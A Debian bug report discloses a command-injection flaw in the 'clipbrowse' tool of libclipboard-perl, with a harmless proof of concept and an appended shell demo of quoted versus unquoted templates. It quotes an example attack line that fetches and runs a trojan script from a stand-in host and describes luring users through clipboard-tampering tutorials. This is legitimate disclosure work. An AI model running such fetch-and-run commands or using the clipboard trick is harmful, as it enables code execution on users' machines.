Bug#1060060: libclipboard-perl: 'clipbrowse' from Debian package libclipboard-perl executing clipboard contents

Sebastiaan Giebels spam_debian_reportbug at pcprobleemloos.nl
Fri Jan 5 12:25:54 GMT 2024


Package: libclipboard-perl
Version: 0.27-1
Severity: important

Dear Maintainer,

I was checking out the 'clipbrowse' command from the Debian package
libclipboard-perl, while at the same time I was making notes on installation
instructions for a different application, thereby having multiple lines in the
clipboard buffer, including a line in the format "curl ... | sh"

I ran the 'clipbrowse' command, not knowing the command usage exactly and
expecting both an error and syntax example.

   * What was the outcome of this action?
It opened a browser with the URL on the clipboard in the foreground (expected),
and simultaneously started the installation process for the application in the
now hidden terminal/console (not expected).

   * What outcome did you expect instead?
I did not expect the clipbrowse command to run clipboard contents in a shell.



Example: Copy the following 2 lines into the clipboard, then run the
'clipbrowse' command:

https://www.example.com
echo echo p0wned | sh

This results in the browser opening the requested URL in the foreground, while
simultaneously running the specified command in the background.
Tested on Debian 12, Perl 5.36.0-7+deb12u1, libclipboard-perl 0.27-1
This example might just print 'p0wned', but because you are copying this piece
of text using a browser that understands JavaScript, and JavaScript can modify
the clipboard contents, I could just as well have you execute "curl
https://evilhacker.example.com/install_trojan.sh | sh" by changing the
clipboard contents on an OnClipboard-event.
This could be abused by including the 'clipbrowse' command as an instruction in
an online tutorial, while having modified the user's clipboard contents using
JavaScript.


I've raised the issue at the author's GitHub page (
https://github.com/shlomif/Clipboard/issues/11 ), but only today I've noticed
that the vulnerability might be with just the Debian package, not the
source package.


I believe the cause of this is by not enclosing a variable with double quotes:

The original source code (
https://github.com/shlomif/Clipboard/blob/master/scripts/clipbrowse ) has
double quotes around the variable %s
  my $browser = $ENV{BROWSER} || 'chromium-browser "%s"';
And performs some string sanitizing in other lines.

The Debian version does not have these quotes, making the string sanitizing
ineffective:
'/usr/bin/clipbrowse' contains the following line:
  my $browser = $ENV{BROWSER} || 'sensible-browser %s';

I have not checked if other packages that have been changed to use
sensible-browser have the same issue.


-- System Information:
Debian Release: 12.4
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable-security'), (500, 'unstable'), (500, 'stable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 6.1.0-14-amd64 (SMP w/4 CPU threads; PREEMPT)
Kernel taint flags: TAINT_PROPRIETARY_MODULE, TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE=en_US:en
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages libclipboard-perl depends on:
ii  perl   5.36.0-7+deb12u1
ii  xclip  0.13-2

Versions of packages libclipboard-perl recommends:
ii  libcgi-pm-perl  4.55-1
ii  liburi-perl     5.17-1
ii  sensible-utils  0.0.17+nmu1

libclipboard-perl suggests no packages.

-- no debconf information
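
The difference between the two templates quoted in the report, as an added example that is not part of the original report or of either package's code. It assumes the script fills %s with the clipboard text and hands the resulting string to a shell; `echo open` stands in for the browser, and `run_template`, `is_single_url` and `open_url` are hypothetical names.

```shell
#!/bin/sh
# Constructed clipboard sample: a URL followed by a harmless second line.
CLIP='https://www.example.com
echo SECOND-LINE-RAN'

# Assumption: the template's %s is replaced by the clipboard text and the
# resulting string is parsed by a shell. "echo open" stands in for the browser.
run_template() {    # $1 = template containing %s, $2 = clipboard text
    # $1 is used as the printf format on purpose, to mirror the %s template.
    sh -c "$(printf "$1" "$2")"
}

# Accept only a single http(s) URL with no whitespace or line breaks.
is_single_url() {
    case $1 in
        *[[:space:]]*) return 1 ;;
        http://?*|https://?*) return 0 ;;
        *) return 1 ;;
    esac
}

# Hardened form: validate first, then pass the text as one argument to the
# command, so no shell parses the clipboard text as code.
open_url() {
    is_single_url "$1" || { echo "refused: not a single URL" >&2; return 1; }
    echo open "$1"
}

# Unquoted %s: the line break ends the browser command and the shell runs
# the second clipboard line as a command of its own.
echo "--- unquoted template:"; run_template 'echo open %s' "$CLIP"

# Quoted "%s": for this sample the line break stays inside one argument, so
# the second line is printed as data. The report notes that upstream also
# sanitizes the string in addition to quoting it.
echo "--- quoted template:";   run_template 'echo open "%s"' "$CLIP"

# Argument passing: the multi-line sample is refused, a plain URL is opened.
echo "--- argument passing:";  open_url "$CLIP" || true
open_url 'https://www.example.com'
```
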


